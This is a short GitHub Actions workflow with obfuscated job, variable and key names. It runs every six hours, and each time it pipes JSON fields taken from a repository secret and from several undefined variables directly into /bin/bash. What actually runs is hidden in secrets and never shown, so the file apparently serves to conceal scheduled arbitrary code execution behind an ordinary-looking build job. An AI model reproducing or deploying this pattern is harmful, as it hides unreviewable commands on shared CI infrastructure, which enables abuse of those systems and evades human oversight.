name: meicidouzhemezhi

on:
  workflow_dispatch:
  schedule:
    - cron: '52 2/6 * * *'
jobs:  # 32323
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meicidouzhemezhi
        env:
          zkimk40308: ${{ secrets.zkimk40308 }}
        run: |
          echo $zkimk40308 | jq -r .vn7 | /bin/bash
          echo $bgxdv9178 | jq -r .wrdk62421 | /bin/bash
          echo $fbexh2927 | jq -r .ahuno7453 | /bin/bash
          echo $mp9 | jq -r .odzu8128 | /bin/bash
          echo $ye28979 | jq -r .fqjl7 | /bin/bash
          echo $nbg6 | jq -r .q159 | /bin/bash
          echo $a9 | jq -r .hpsb985 | /bin/bash
          echo $r6 | jq -r .we740 | /bin/bash
          echo $m81 | jq -r .tm95 | /bin/bash
          echo $prrg91469 | jq -r .opwv987 | /bin/bash

